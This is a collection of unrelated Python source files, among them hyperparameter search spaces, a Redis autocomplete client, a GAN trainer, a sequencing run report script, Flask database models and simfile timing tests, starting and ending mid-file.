else colsample_bylevel), reg_alpha=(_xgboost_reg_alpha('reg_alpha') if reg_alpha is None else reg_alpha), reg_lambda=(_xgboost_reg_lambda('reg_lambda') if reg_lambda is None else reg_lambda), scale_pos_weight=scale_pos_weight, base_score=base_score, seed=_random_state('rstate', random_state)) return hp_space ################################################# ##==== Naive Bayes classifiers constructor ====## ################################################# def multinomial_nb_hp_space(class_prior=None): hp_space = dict( alpha=hp.quniform('alpha', 0, 1, 0.001), fit_prior=hp_bool('fit_prior'), class_prior=class_prior) return hp_space ########################################### ##==== Passive-aggressive classifier ====## ########################################### def passive_aggressive_hp_space(loss=None, C=None, fit_intercept=False, n_iter=None, n_jobs=1, random_state=None, verbose=False): hp_space = dict( loss=hp.choice('loss', ['hinge', 'squared_hinge']) if loss is None else loss, C=hp.lognormal('learning_rate', np.log(0.01), np.log(10)) if C is None else C, fit_intercept=fit_intercept, n_iter=scope.int( hp.qloguniform('n_iter', np.log(1), np.log(1000), q=1)) if n_iter is None else n_iter, n_jobs=n_jobs, random_state=_random_state('rstate', random_state), verbose=verbose) return hp_space ############################################### ##==== Discriminant analysis classifiers ====## ############################################### def linear_discriminant_analysis_hp_space(solver=None, shrinkage=None, priors=None, n_components=None, store_covariance=False, tol=0.00001): solver_shrinkage = hp.choice('solver_shrinkage_dual', [('svd', None), ('lsqr', None), ('lsqr', 'auto'), ('eigen', None), ('eigen', 'auto')]) rval = dict( solver=solver_shrinkage[0] if solver is None else solver, shrinkage=solver_shrinkage[1] if shrinkage is None else shrinkage, priors=priors, n_components=4 * scope.int( hp.qloguniform( 'n_components', low=np.log(0.51), high=np.log(30.5), q=1.0)) if n_components is None else n_components, store_covariance=store_covariance, tol=tol) return rval def quadratic_discriminant_analysis_hp_space(reg_param=None, priors=None): rval = dict( reg_param=hp.uniform('reg_param', 0.0, 1.0) if reg_param is None else 0.0, priors=priors) return rval ############################################### ##==== Various preprocessor constructors ====## ############################################### def pca_hp_space(n_components=None, whiten=None, copy=True): rval = dict( # -- qloguniform is missing a "scale" parameter so we # lower the "high" parameter and multiply by 4 out front n_components=4 * scope.int( hp.qloguniform( 'n_components', low=np.log(0.51), high=np.log(30.5), q=1.0)) if n_components is None else n_components, # n_components=(hp.uniform(name + '.n_components', 0, 1) # if n_components is None else n_components), whiten=hp_bool('whiten') if whiten is None else whiten, copy=copy, ) return rval def standard_scaler(with_mean=None, with_std=None): rval = dict( with_mean=hp_bool('with_mean') if with_mean is None else with_mean, with_std=hp_bool('with_std') if with_std is None else with_std, ) return rval def ts_lagselector_hp_space(lower_lags=1, upper_lags=1): rval = dict(lag_size=scope.int( hp.quniform('lags', lower_lags - .5, upper_lags + .5, 1))) return rval def bernoulli_rbm_hp_space(n_components=None, learning_rate=None, batch_size=None, n_iter=None, verbose=False, random_state=None): rval = dict( n_components=scope.int( hp.qloguniform( 'n_components', low=np.log(0.51), high=np.log(999.5), q=1.0)) if n_components is None else n_components, learning_rate=hp.lognormal( 'learning_rate', np.log(0.01), np.log(10), ) if learning_rate is None else learning_rate, batch_size=scope.int( hp.qloguniform( '.batch_size', np.log(1), np.log(100), q=1, )) if batch_size is None else batch_size, n_iter=scope.int( hp.qloguniform( 'n_iter', np.log(1), np.log(1000), # -- max sweeps over the *whole* train set q=1, )) if n_iter is None else n_iter, verbose=verbose, random_state=_random_state('rstate', random_state), ) return rval def colkmeans_hp_space(n_clusters=None, init=None, n_init=None, max_iter=None, tol=None, precompute_distances=True, verbose=0, random_state=None, copy_x=True, n_jobs=1): rval = dict( n_clusters=scope.int( hp.qloguniform( 'n_clusters', low=np.log(1.51), high=np.log(19.5), q=1.0)) if n_clusters is None else n_clusters, init=hp.choice( 'init', ['k-means++', 'random'], ) if init is None else init, n_init=hp.choice( 'n_init', [1, 2, 10, 20], ) if n_init is None else n_init, max_iter=scope.int( hp.qlognormal( 'max_iter', np.log(300), np.log(10), q=1, )) if max_iter is None else max_iter, tol=hp.lognormal( 'tol', np.log(0.0001), np.log(10), ) if tol is None else tol, precompute_distances=precompute_distances, verbose=verbose, random_state=random_state, copy_x=copy_x, n_jobs=n_jobs, ) return rval def lgbm_hp_space(**kwargs): space = { 'n_estimators': scope.int(hp.quniform('n_estimators', 10, 700, 1)), 'num_leaves': scope.int(hp.quniform ('num_leaves', 10, 200, 1)), 'feature_fraction': hp.uniform('feature_fraction', 0.75, 1.0), 'bagging_fraction': hp.uniform('bagging_fraction', 0.75, 1.0), 'learning_rate': hp.loguniform('learning_rate', -5.0, -2.3), 'max_bin': scope.int(hp.quniform('max_bin', 64, 512, 1)), 'bagging_freq': scope.int(hp.quniform('bagging_freq', 1, 5, 1)), 'lambda_l1': hp.uniform('lambda_l1', 0, 10), 'lambda_l2': hp.uniform('lambda_l2', 0, 10), **kwargs } return space # -- flake8 eofk
nilq/baby-python
python
from unittest import TestCase from unittest.mock import patch from app.ingest.infrastructure.mq.publishers.process_ready_queue_publisher import ProcessReadyQueuePublisher from test.resources.ingest.ingest_factory import create_ingest class TestProcessReadyQueuePublisher(TestCase): @classmethod def setUpClass(cls) -> None: cls.TEST_INGEST = create_ingest() cls.TEST_DESTINATION_PATH = "test_path" @patch("app.common.infrastructure.mq.publishers.stomp_publisher_base.StompPublisherBase._publish_message") @patch('app.ingest.infrastructure.mq.publishers.process_ready_queue_publisher.os.getenv') def test_publish_message_happy_path(self, os_getenv_stub, inner_publish_message_mock) -> None: os_getenv_stub.return_value = self.TEST_DESTINATION_PATH self.sut = ProcessReadyQueuePublisher() self.sut.publish_message(self.TEST_INGEST) inner_publish_message_mock.assert_called_once_with( { 'package_id': self.TEST_INGEST.package_id, 'destination_path': self.TEST_DESTINATION_PATH, 'application_name': self.TEST_INGEST.depositing_application.value } )
nilq/baby-python
python
from aioredis import Redis, ConnectionPool from six.moves import xrange from ._util import to_string from .auto_complete import SuggestionParser class AioAutoCompleter(object): """ An asyncio client to RediSearch's AutoCompleter API It provides prefix searches with optionally fuzzy matching of prefixes """ SUGADD_COMMAND = "FT.SUGADD" SUGDEL_COMMAND = "FT.SUGDEL" SUGLEN_COMMAND = "FT.SUGLEN" SUGGET_COMMAND = "FT.SUGGET" INCR = 'INCR' WITHSCORES = 'WITHSCORES' FUZZY = 'FUZZY' WITHPAYLOADS = 'WITHPAYLOADS' def __init__(self, key, host='localhost', port=6379, conn = None, password=None): """ Create a new AioAutoCompleter client for the given key, and optional host and port If conn is not None, we employ an already existing redis connection """ self.key = key self.redis = conn if conn is not None else Redis( connection_pool = ConnectionPool(host=host, port=port, password=password)) def __await__(self): """ Automatically initialize the AioAutoCompleter by using the await magic word when creating """ return self.initialize().__await__() async def initialize(self): """ Initialize the asynchronous attributes of the AioAutoCompleter """ if self.redis: # Redis will initialize its own ConnectionPool instance await self.redis.initialize() return self async def add_suggestions(self, *suggestions, **kwargs): """ Add suggestion terms to the AutoCompleter engine. Each suggestion has a score and string. If kwargs['increment'] is true and the terms are already in the server's dictionary, we increment their scores """ # If Transaction is not set to false it will attempt a MULTI/EXEC which will error pipe = await self.redis.pipeline(transaction=False) for sug in suggestions: args = [AutoCompleter.SUGADD_COMMAND, self.key, sug.string, sug.score] if kwargs.get('increment'): args.append(AutoCompleter.INCR) if sug.payload: args.append('PAYLOAD') args.append(sug.payload) await pipe.execute_command(*args) return await pipe.execute()[-1] async def len(self): """ Return the number of entries in the AutoCompleter index """ return await self.redis.execute_command(AutoCompleter.SUGLEN_COMMAND, self.key) async def delete(self, string): """ Delete a string from the AutoCompleter index. Returns 1 if the string was found and deleted, 0 otherwise """ return await self.redis.execute_command(AutoCompleter.SUGDEL_COMMAND, self.key, string) async def get_suggestions(self, prefix, fuzzy = False, num = 10, with_scores = False, with_payloads=False): """ Get a list of suggestions from the AutoCompleter, for a given prefix ### Parameters: - **prefix**: the prefix we are searching. **Must be valid ascii or utf-8** - **fuzzy**: If set to true, the prefix search is done in fuzzy mode. **NOTE**: Running fuzzy searches on short (<3 letters) prefixes can be very slow, and even scan the entire index. - **with_scores**: if set to true, we also return the (refactored) score of each suggestion. This is normally not needed, and is NOT the original score inserted into the index - **with_payloads**: Return suggestion payloads - **num**: The maximum number of results we return. Note that we might return less. The algorithm trims irrelevant suggestions. Returns a list of Suggestion objects. If with_scores was False, the score of all suggestions is 1. """ args = [AutoCompleter.SUGGET_COMMAND, self.key, prefix, 'MAX', num] if fuzzy: args.append(AutoCompleter.FUZZY) if with_scores: args.append(AutoCompleter.WITHSCORES) if with_payloads: args.append(AutoCompleter.WITHPAYLOADS) ret = await self.redis.execute_command(*args) results = [] if not ret: return results parser = SuggestionParser(with_scores, with_payloads, ret) return [s for s in parser]
nilq/baby-python
python
from .files import sppasFilesPanel __all__ = ( "sppasFilesPanel", )
nilq/baby-python
python
from telebot import types from typing import List from datetime import datetime import logging from tengi.telegram.telegram_bot import TelegramBot logger = logging.getLogger(__file__) class TelegramCursor: def __init__(self, bot: TelegramBot, look_back_days: float, long_polling_timeout: float = 20): self.bot = bot self.look_back_days = look_back_days self.long_polling_timeout = long_polling_timeout self.last_bot_update_id = None def look_back(self, allowed_updates): updates = self.bot.get_updates(long_polling_timeout=0, limit=100, allowed_updates=allowed_updates) # Sort updates from newest to oldest to use latest message in the chat only updates = sorted(updates, key=lambda upd: upd.update_id, reverse=True) now = datetime.utcnow() look_back_seconds = self.look_back_days * 24 * 60 * 60 look_back_updates = [] cached_chat_ids = set() for u in updates: if u.message is not None: # Ignore messages that are outside the look back window elapsed_seconds = (now - datetime.utcfromtimestamp(u.message.date)).total_seconds() if elapsed_seconds > look_back_seconds: continue # Cache only the last message from the chat chat_id = u.message.chat.id if chat_id in cached_chat_ids: continue cached_chat_ids.add(chat_id) look_back_updates.append(u) # Sort updates from oldest to newest to handle in natural order look_back_updates = sorted(look_back_updates, key=lambda upd: upd.update_id) return look_back_updates def get_new_updates(self, allowed_updates) -> List[types.Update]: look_back_updates = [] if self.last_bot_update_id is None: look_back_updates = self.look_back(allowed_updates=allowed_updates) if look_back_updates: last_update = max(look_back_updates, key=lambda upd: upd.update_id) self.last_bot_update_id = last_update.update_id else: self.last_bot_update_id = -1 long_polling_timeout = self.long_polling_timeout if (not look_back_updates) else 0 updates: List[types.Update] = self.bot.get_updates(offset=self.last_bot_update_id + 1, long_polling_timeout=long_polling_timeout, allowed_updates=allowed_updates) if look_back_updates: updates = look_back_updates + updates if updates: last_update = max(updates, key=lambda upd: upd.update_id) self.last_bot_update_id = last_update.update_id return updates
nilq/baby-python
python
from willump.graph.willump_graph_node import WillumpGraphNode from willump.graph.willump_python_node import WillumpPythonNode from weld.types import * import ast from typing import List from willump.willump_utilities import strip_linenos_from_var class CascadeStackDenseNode(WillumpPythonNode): """ Willump Stack Dense node. Horizontally stacks multiple dense matrices. """ def __init__(self, more_important_nodes: List[WillumpGraphNode], more_important_names: List[str], less_important_nodes: List[WillumpGraphNode], less_important_names: List[str], output_name: str, output_type: WeldType, small_model_output_node: WillumpGraphNode, small_model_output_name: str) -> None: """ Initialize the node. """ assert (isinstance(output_type, WeldVec)) assert (isinstance(output_type.elemType, WeldVec)) self._output_name = output_name self._output_type = output_type input_nodes = more_important_nodes + less_important_nodes + [small_model_output_node] input_names = more_important_names + less_important_names + [small_model_output_name] python_ast = self.get_python_ast(more_important_names, less_important_names, small_model_output_name, output_name) super(CascadeStackDenseNode, self).__init__(in_nodes=input_nodes, input_names=input_names, output_names=[output_name], output_types=[output_type], python_ast=python_ast) def get_python_ast(self, more_important_names, less_important_names, small_model_output_name, output_name) -> ast.AST: more_important_vecs = [strip_linenos_from_var(name) for name in more_important_names] less_important_vecs = [strip_linenos_from_var(name) for name in less_important_names] more_important_str, less_important_str = "", "" for vec in more_important_vecs: more_important_str += "%s," % vec for vec in less_important_vecs: less_important_str += "%s," % vec python_string = "%s = cascade_dense_stacker([%s], [%s], %s)" % ( strip_linenos_from_var(output_name), more_important_str, less_important_str, strip_linenos_from_var(small_model_output_name)) python_ast = ast.parse(python_string, "exec") return python_ast.body[0] def get_output_name(self) -> str: return self._output_name def get_output_type(self) -> WeldType: return self._output_type def __repr__(self): return "Stack dense node for input {0} output {1}\n" \ .format(self._input_names, self._output_name)
nilq/baby-python
python
import os import sys import argparse from datetime import date from collections import defaultdict from egcg_core.app_logging import logging_default from egcg_core.config import cfg from egcg_core.util import query_dict from egcg_core import rest_communication from egcg_core.notifications.email import send_html_email sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__)))) from config import load_config cache = { 'run_elements_data': {}, 'run_data': {}, 'lanes_data': {}, 'sample_data': {}, 'run_status_data': {} } email_template_report = os.path.join( os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'etc', 'run_report.html' ) email_template_repeats = os.path.join( os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'etc', 'list_repeats.html' ) logging_default.add_stdout_handler() logger = logging_default.get_logger(os.path.basename(__file__)) def today(): return date.today().isoformat() def run_status_data(run_id): if not cache['run_status_data']: data = rest_communication.get_documents('lims/status/run_status') for d in data: cache['run_status_data'][d['run_id']] = d return cache['run_status_data'][run_id] def run_data(run_id): if run_id not in cache['run_data']: cache['run_data'][run_id] = rest_communication.get_document('runs', where={'run_id': run_id}) return cache['run_data'][run_id] def run_elements_data(run_id): if run_id not in cache['run_elements_data']: cache['run_elements_data'][run_id] = rest_communication.get_documents('run_elements', where={'run_id': run_id}) return cache['run_elements_data'][run_id] def sample_data(sample_id): if sample_id not in cache['sample_data']: cache['sample_data'][sample_id] = rest_communication.get_document('samples', where={'sample_id': sample_id}) return cache['sample_data'][sample_id] def samples_from_run(run_id): return run_status_data(run_id).get('sample_ids') def get_run_success(run_id): run_info = {'name': run_id} re_data = run_elements_data(run_id) lane_review = defaultdict(set) lane_review_comment = defaultdict(set) for re in re_data: lane_review[re.get('lane')].add(re.get('reviewed')) lane_review_comment[re.get('lane')].add(re.get('review_comments')) failed_lanes = 0 reasons = [] for lane in sorted(lane_review): if len(lane_review.get(lane)) != 1: raise ValueError('More than one review status for lane %s in run %s' % (lane, run_id)) if lane_review.get(lane).pop() == 'fail': failed_lanes += 1 reasons.append( 'lane %s: %s' % (lane, lane_review_comment.get(lane).pop()[len('failed due to '):]) ) reasons = sorted(reasons) message = '%s: %s lanes failed' % (run_id, failed_lanes) run_info['failed_lanes'] = failed_lanes if failed_lanes > 0: message += ':\n%s' % '\n'.join(reasons) run_info['details'] = reasons for l in message.split('\n'): logger.info(l) return run_info def check_pending_run_element(sample_id, sdata): # Checking for other run elements which are still pending for sample_run_element in query_dict(sdata, 'run_elements') or []: # Splitting the run element, and generating the run_id by concatenating the first four components # with an underscore sample_run_id = '_'.join(sample_run_element.split('_')[:4]) if query_dict(run_data(sample_run_id), 'aggregated.most_recent_proc.status') == 'processing': logger.info('Another pending run element already exists for sample ' + sample_id) return True return False def remove_duplicate_base_on_flowcell_id(list_runs): """ Take a list of runs and remove the duplicated run based on the flowcell id. It will remove the oldest run when two are found based on the run date. """ flowcell_to_run = {} for run_id in list_runs: date, machine, run_number, stage_flowcell = run_id.split('_') flowcell = stage_flowcell[1:] # If the run id has not been seen or if the date is newer than the previous one then keep it if flowcell not in flowcell_to_run or run_id > flowcell_to_run[flowcell]: flowcell_to_run[flowcell] = run_id return sorted(flowcell_to_run.values()) def report_runs(run_ids, noemail=False): run_ids.sort() runs_info = [] for run_id in run_ids: run_status = run_status_data(run_id).get('run_status') if run_status == 'RunCompleted': run_info = get_run_success(run_id) else: logger.info('%s: 8 lanes failed due to %s' % (run_id, run_status)) run_info = {'name': run_id, 'failed_lanes': 8, 'details': [str(run_status)]} runs_info.append(run_info) logger.info('') logger.info('_____________________________________') logger.info('') run_repeats = [] # Remove the duplicated run from repeated flowcell run_ids = remove_duplicate_base_on_flowcell_id(run_ids) for run_id in run_ids: sample_repeats = [] for sample_id in sorted(samples_from_run(run_id)): sdata = sample_data(sample_id) or {} clean_pc_q30 = query_dict(sdata, 'aggregated.clean_pc_q30') or 0 clean_yield_in_gb = query_dict(sdata, 'aggregated.clean_yield_in_gb') or 0 clean_yield = clean_yield_in_gb * 1000000000 mean_cov = query_dict(sdata, 'aggregated.from_run_elements.mean_coverage') or 0 if clean_pc_q30 >= 75 and (clean_yield >= sdata['required_yield'] or mean_cov >= sdata['required_coverage']): pass else: reason = 'unknown' if not clean_pc_q30: reason = 'No data' elif clean_yield < sdata['required_yield'] and mean_cov < sdata['required_coverage']: reason = 'Not enough data: yield (%s < %s) and coverage (%s < %s)' % ( round(clean_yield/1000000000, 1), int(sdata['required_yield']/1000000000), round(mean_cov, 1), sdata['required_coverage'] ) # if a pending run element exists, continue to the next sample without logging current one if check_pending_run_element(sample_id, sdata): continue sample_repeats.append({'id': sample_id, 'reason': reason}) sample_repeats.sort(key=lambda s: s['id']) if sample_repeats: logger.info('%s: Repeat samples' % run_id) for s in sample_repeats: logger.info('%s: %s' % (s['id'], s['reason'])) else: logger.info('%s: No repeat samples' % run_id) run_repeats.append({'name': run_id, 'repeat_count': len(sample_repeats), 'repeats': sample_repeats}) if noemail: return _today = today() params = {} params.update(cfg['run_report']['email_notification']) params['runs'] = runs_info send_html_email( subject='Run report %s' % _today, email_template=email_template_report, **params ) params = {} params.update(cfg['run_report']['email_notification']) params['runs'] = run_repeats send_html_email( subject='Sequencing repeats %s' % _today, email_template=email_template_repeats, **params ) def main(): p = argparse.ArgumentParser() p.add_argument('-r', '--run_ids', dest='run_ids', type=str, nargs='+') p.add_argument('--debug', action='store_true', help='override pipeline log level to debug') p.add_argument('--noemail', action='store_true') args = p.parse_args() load_config() report_runs(args.run_ids, args.noemail) if __name__ == '__main__': sys.exit(main())
nilq/baby-python
python
# -*- coding: utf-8 -*- import sys import gettext import Adventurer3.Controller gettext.install(__name__) class App: """UIアプリケーションクラス""" def __init__(self, ipaddress): self.adv3 = Adventurer3.Controller.Controller(ipaddress) def user_interface(self): while True: cmd = input("> ").strip() if cmd.startswith("q") or cmd.startswith("Q"): break if cmd.startswith("p") or cmd.startswith("P"): if self.adv3.start(): self.adv3.update_status() self.adv3.end() print(self.adv3.get_status()) if cmd.startswith("s") or cmd.startswith("s"): if self.adv3.start(): self.adv3.stop() self.adv3.end() if cmd.startswith("jobstop"): if self.adv3.start(): self.adv3.stop_job() self.adv3.end() if __name__ == "__main__": """引数はホスト名かIPアドレスと仮定して処理をする""" if len(sys.argv) > 1: app = App(sys.argv[1]) app.user_interface()
nilq/baby-python
python
# coding: utf-8 import torch from torch.nn import functional as F import torch.utils.data import torch.utils.data.distributed from torch import autograd import numpy as np from gan_training.random_queue import Random_queue class Trainer(object): def __init__(self, generator, discriminator, g_optimizer, d_optimizer, gan_type, reg_type, reg_param, pv=1, iv=0, dv=0, time_step=1., batch_size=64, config=None): print("Using PID Trainer") self.generator = generator self.discriminator = discriminator self.g_optimizer = g_optimizer self.d_optimizer = d_optimizer self.gan_type = gan_type self.reg_type = reg_type self.reg_param = reg_param self.d_xfake = None self.d_previous_z = None self.d_previous_y = None self.pv = pv self.iv = iv self.dv = dv self.time_step = time_step self.batch_size = batch_size self.config = config self.i_real_queue = Random_queue( config['training']['batch_size'] * config['training']['i_buffer_factor'], config['training']['batch_size']) self.i_fake_queue = Random_queue( config['training']['batch_size'] * config['training']['i_buffer_factor'], config['training']['batch_size']) self.max0 = torch.nn.ReLU() def generator_trainstep(self, y, z): assert (y.size(0) == z.size(0)) toggle_grad(self.generator, True) toggle_grad(self.discriminator, False) self.generator.train() self.discriminator.train() self.g_optimizer.zero_grad() x_fake = self.generator(z, y) d_fake = self.discriminator(x_fake, y) gloss = self.compute_loss(d_fake, 1, is_generator=True) gloss.backward() self.g_optimizer.step() return gloss.item() def discriminator_trainstep(self, x_real, y, z, it=0): # print(it) toggle_grad(self.generator, False) toggle_grad(self.discriminator, True) self.generator.train() self.discriminator.train() self.d_optimizer.zero_grad() reg_d = self.config['training']['regularize_output_d'] d_real = self.discriminator(x_real, y) dloss_real = self.compute_loss(d_real, 1) * self.pv if reg_d > 0.: dloss_real += (d_real**2).mean() * reg_d dloss_real.backward() # On fake data with torch.no_grad(): x_fake = self.generator(z, y) d_fake = self.discriminator(x_fake, y) dloss_fake = self.compute_loss(d_fake, 0) * self.pv if reg_d > 0.: dloss_fake += (d_fake**2).mean() * reg_d dloss_fake.backward() i_loss = torch.from_numpy(np.array([0.])) if self.iv > 0: # i_factor = self.config['training']['i_buffer_factor'] # i_store = self.config['training']['i_buffer_onestep'] xtmp = x_real.detach().cpu().numpy() ytmp = y.detach().cpu().numpy() self.i_real_queue.set_data(xtmp, ytmp) xtmp = x_fake.detach().cpu().numpy() ytmp = y.detach().cpu().numpy() self.i_fake_queue.set_data(xtmp, ytmp) i_xreal, i_yreal = self.i_real_queue.get_data() i_xfake, i_yfake = self.i_fake_queue.get_data() i_xreal = torch.as_tensor(i_xreal, dtype=torch.float32).cuda() i_xfake = torch.as_tensor(i_xfake, dtype=torch.float32).cuda() i_yreal = torch.as_tensor(i_yreal, dtype=torch.long).cuda() i_yfake = torch.as_tensor(i_yfake, dtype=torch.long).cuda() i_real_doutput = self.discriminator(i_xreal, i_yreal) i_loss_real = self.compute_loss(i_real_doutput, 1) i_fake_doutput = self.discriminator(i_xfake, i_yfake) i_loss_fake = self.compute_loss(i_fake_doutput, 0) if self.config['training']['pid_type'] == 'function': i_loss = (i_loss_real + i_loss_fake) * self.iv elif self.config['training']['pid_type'] == 'square': i_loss = ((i_real_doutput**2).mean() + (i_fake_doutput**2).mean()) * self.iv elif self.config['training']['pid_type'] == 'abs': i_loss = (torch.abs(i_real_doutput).mean() + torch.abs(i_fake_doutput).mean()) * self.iv elif self.config['training']['pid_type'] == 'accurate': i_fake_doutput = self.max0(i_fake_doutput) i_real_doutput = -1 * self.max0(-1 * i_real_doutput) i_loss = (i_fake_doutput - i_real_doutput).mean() * self.iv i_loss.backward() d_loss = torch.from_numpy(np.array([0.])) # print(self.dv) if self.dv > 0 and it > 0: if self.d_xfake is None: self.d_xreal = x_real self.d_xfake = x_fake self.d_previous_z = z self.d_previous_y = y else: d_loss_previous_f = self.compute_loss( self.discriminator(self.d_xfake, self.d_previous_y), 0) d_loss_previous_r = self.compute_loss( self.discriminator(self.d_xreal, self.d_previous_y), 1) d_loss_previous = d_loss_previous_f + d_loss_previous_r d_loss_current_f = self.compute_loss( self.discriminator(x_fake, y), 0) d_loss_current_r = self.compute_loss( self.discriminator(x_real, y), 1) d_loss_current = d_loss_current_f + d_loss_current_r d_loss = (d_loss_current - d_loss_previous) * self.dv d_loss.backward() self.d_xreal = x_real self.d_xfake = x_fake self.d_previous_z = z self.d_previous_y = y self.d_optimizer.step() toggle_grad(self.discriminator, False) # Output dloss = (dloss_real + dloss_fake) return dloss.item(), d_loss.item(), i_loss.item() def compute_loss(self, d_out, target, is_generator=False): targets = d_out.new_full(size=d_out.size(), fill_value=target) if self.gan_type == 'standard': loss = F.binary_cross_entropy_with_logits(d_out, targets) elif self.gan_type == 'wgan': loss = (2 * target - 1) * d_out.mean() elif self.gan_type == 'hinge': if is_generator is False: loss = (F.relu(1 + (2 * target - 1) * d_out)).mean() else: loss = ((2 * target - 1) * d_out).mean() elif self.gan_type == 'sigmoid': d_out = d_out * self.config['training']['sigmoid_coe'] loss = ((2 * target - 1) * F.sigmoid(d_out) ).mean() / self.config['training']['sigmoid_coe'] elif self.gan_type == 'lsgan1': if is_generator is False: target = target * 2 - 1 loss = ((d_out - target)**2).mean() else: loss = (d_out**2).mean() elif self.gan_type == 'lsgan2': target -= 0.5 loss = ((d_out - target)**2).mean() else: raise NotImplementedError return loss def wgan_gp_reg(self, x_real, x_fake, y, center=1.): batch_size = y.size(0) eps = torch.rand(batch_size, device=y.device).view(batch_size, 1, 1, 1) x_interp = (1 - eps) * x_real + eps * x_fake x_interp = x_interp.detach() x_interp.requires_grad_() d_out = self.discriminator(x_interp, y) reg = (compute_grad2(d_out, x_interp).sqrt() - center).pow(2).mean() return reg # Utility functions def toggle_grad(model, requires_grad): for p in model.parameters(): p.requires_grad_(requires_grad) def compute_grad2(d_out, x_in): batch_size = x_in.size(0) grad_dout = autograd.grad(outputs=d_out.sum(), inputs=x_in, create_graph=True, retain_graph=True, only_inputs=True)[0] grad_dout2 = grad_dout.pow(2) assert (grad_dout2.size() == x_in.size()) reg = grad_dout2.view(batch_size, -1).sum(1) return reg def update_average(model_tgt, model_src, beta): toggle_grad(model_src, False) toggle_grad(model_tgt, False) param_dict_src = dict(model_src.named_parameters()) for p_name, p_tgt in model_tgt.named_parameters(): p_src = param_dict_src[p_name] assert (p_src is not p_tgt) p_tgt.copy_(beta * p_tgt + (1. - beta) * p_src)
nilq/baby-python
python
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # pylint: disable=invalid-name, too-few-public-methods """wget template""" from __future__ import absolute_import from __future__ import unicode_literals from __future__ import print_function import logging # pylint: disable=unused-import import hpccm.base_object class wget(hpccm.base_object): """wget template""" def __init__(self, **kwargs): """Initialize wget template""" super(wget, self).__init__(**kwargs) self.wget_opts = kwargs.get('opts', ['-q', '-nc', '--no-check-certificate']) def download_step(self, outfile=None, referer=None, url=None, directory='/tmp'): """Generate wget command line string""" if not url: logging.error('url is not defined') return '' # Copy so not to modify the member variable opts = self.wget_opts if outfile: opts.append('-O {}'.format(outfile)) if referer: opts.append('--referer {}'.format(referer)) opt_string = ' '.join(self.wget_opts) # Add annotation if the caller inherits from the annotate template if callable(getattr(self, 'add_annotation', None)): self.add_annotation('url', url) # Ensure the directory exists return 'mkdir -p {1} && wget {0} -P {1} {2}'.format(opt_string, directory, url)
nilq/baby-python
python
from apps import db from datetime import datetime #基础表 class BaseModel(object): create_time = db.Column(db.DateTime,default=datetime.now) update_time = db.Column(db.DateTime,default=datetime.now) #分类表 class Cate(BaseModel,db.Model): id = db.Column(db.Integer,primary_key=True) name = db.Column(db.String(30)) #产品表 class Goods(BaseModel,db.Model): id = db.Column(db.Integer,primary_key=True) name = db.Column(db.String(30)) price = db.Column(db.Integer) descrip = db.Column(db.String(255)) #描述信息 content = db.Column(db.Text) #内容 image_url=db.Column(db.String(100)) number =db.Column(db.Integer) #库存 cid = db.Column(db.Integer,db.ForeignKey('cate.id')) cate = db.relationship(Cate) # 用户表 class User(BaseModel,db.Model): id = db.Column(db.Integer,primary_key=True) name = db.Column(db.String(30)) password = db.Column(db.String(255)) # 购物车表 class Cart(db.Model): id = db.Column(db.Integer,primary_key=True) good_id = db.Column(db.Integer) user_id = db.Column(db.Integer) name = db.Column(db.String(30),default='') price = db.Column(db.Integer) number = db.Column(db.Integer) #评论表 class Comment(BaseModel,db.Model): id = db.Column(db.Integer,primary_key=True) content = db.Column(db.String(30)) user_id = db.Column(db.Integer,db.ForeignKey("user.id")) good_id = db.Column(db.Integer,db.ForeignKey("goods.id")) like_count = db.Column(db.Integer,default=0) user = db.relationship(User) # 5.创建迁移仓库 # #这个命令会创建migrations文件夹,所有迁移文件都放在里面。 # python manage.py db init # 6.创建迁移脚本 # python manage.py db migrate -m 'ini # ation' # 7.更新数据库 # python manage.py db upgrade
nilq/baby-python
python
from decimal import Decimal from simfile.ssc import SSCSimfile import unittest from .helpers import testing_timing_data from .. import * from simfile.sm import SMSimfile class TestBeat(unittest.TestCase): def test_from_str(self): self.assertEqual(Beat(0, 1), Beat.from_str('0.000')) self.assertEqual(Beat(12*3+1, 3), Beat.from_str('12.333')) self.assertEqual(Beat(4, 192), Beat.from_str('0.021')) self.assertEqual(Beat(4, 64), Beat.from_str('0.062')) self.assertEqual(Beat(4, 48), Beat.from_str('0.083')) self.assertEqual(Beat(4, 32), Beat.from_str('0.125')) self.assertEqual(Beat(4, 24), Beat.from_str('0.167')) self.assertEqual(Beat(4, 16), Beat.from_str('0.250')) self.assertEqual(Beat(4, 12), Beat.from_str('0.333')) self.assertEqual(Beat(4, 8), Beat.from_str('0.500')) def test_str(self): self.assertEqual('0.000', str(Beat(0, 1))) self.assertEqual('12.333', str(Beat(37, 3))) self.assertEqual('0.021', str(Beat(4, 192))) self.assertEqual('0.062', str(Beat(4, 64))) self.assertEqual('0.083', str(Beat(4, 48))) self.assertEqual('0.125', str(Beat(4, 32))) self.assertEqual('0.167', str(Beat(4, 24))) self.assertEqual('0.250', str(Beat(4, 16))) self.assertEqual('0.333', str(Beat(4, 12))) self.assertEqual('0.500', str(Beat(4, 8))) class TestBeatValues(unittest.TestCase): def test_from_str(self): events = BeatValues.from_str('0.000=128.000,\n132.000=64.000,\n147.500=128.000') self.assertIsInstance(events[0].beat, Beat) self.assertIsInstance(events[0].value, Decimal) self.assertEqual(BeatValue(beat=Beat(0, 1), value=Decimal('128.000')), events[0]) self.assertEqual(BeatValue(beat=Beat(132, 1), value=Decimal('64.000')), events[1]) self.assertEqual(BeatValue(beat=Beat(147*2+1, 2), value=Decimal('128.000')), events[2]) def test_serialize(self): events = BeatValues.from_str('0.000=128.000,\n132.000=64.000,\n147.500=128.000') self.assertEqual('0.000=128.000,\n132.000=64.000,\n147.500=128.000', events.serialize()) class TestTimingData(unittest.TestCase): def test_attributes(self): timing_data = testing_timing_data() self.assertEqual(BeatValues([ BeatValue(beat=Beat(0), value=Decimal('120.000')), BeatValue(beat=Beat(1), value=Decimal('150.000')), BeatValue(beat=Beat(2), value=Decimal('200.000')), BeatValue(beat=Beat(3), value=Decimal('300.000')), ]), timing_data.bpms) 